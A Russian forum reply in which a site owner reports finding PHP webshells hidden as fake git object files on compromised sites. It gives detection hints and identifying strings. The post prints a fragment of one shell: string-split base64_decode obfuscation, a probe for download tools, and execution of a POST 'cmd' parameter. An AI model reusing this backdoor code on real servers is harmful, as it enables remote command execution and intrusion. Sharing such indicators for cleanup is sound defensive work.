Спасибо всем за эту тему. Мои пять копеек: на одном старом сайте (из пяти пострадавших) нашёл ещё три "подарка" в папке .git.
Палятся по тому, что git gc начинает ругаться "bad sha1..." с путём к файлам .git/objects/6a/e93177.php .git/objects/7a/c13cf3.php
внутри что-то вот такое (оставлено самое интересное, хостер бегет эти вещи спалил своим скриптом проверки,кстати)
Палятся по тому, что git gc начинает ругаться "bad sha1..." с путём к файлам .git/objects/6a/e93177.php .git/objects/7a/c13cf3.php
внутри что-то вот такое (оставлено самое интересное, хостер бегет эти вещи спалил своим скриптом проверки,кстати)
| Код |
|---|
$down = "which get;which wget;which lynx;which curl;which fetch;which links;";
$aTwo = "ba" . "se" . "6" . "4" . "_" . "en" . "co" . "de";
$bTwo = "ba" . "se" . "6" . "4" . "_" . "de" . "co" . "de";
$fun = $bTwo("cGhwIC1yICdwcmludF9yKGdldF9kZWZpbmVkX2Z1bmN0aW9ucygpKTsnIHwgZ3JlcCAtRSAnIChzeXN0ZW18ZXhlY3xzaGVsbF9leGVjfHBhc3N0aHJ1fHByb2Nfb3Blbnxwb3BlbnxjdXJsX2V4ZWN8Y3VybF9tdWx0aV9leGVjfHBhcnNlX2luaV9maWxlfHNob3dfc291cmNlKSc");
if (isset($_POST['cmd'])) {
echo '<pre>';
$a1($_POST['cmd']); |
и один "загрузчик фоточек для форума" в .git/objects/7a/c13cf3.php, внутри отличительные черты это строки
"648ae5b4a83b380bc7e163b26c28950b"
header('Content-Description: gallery Transfer');
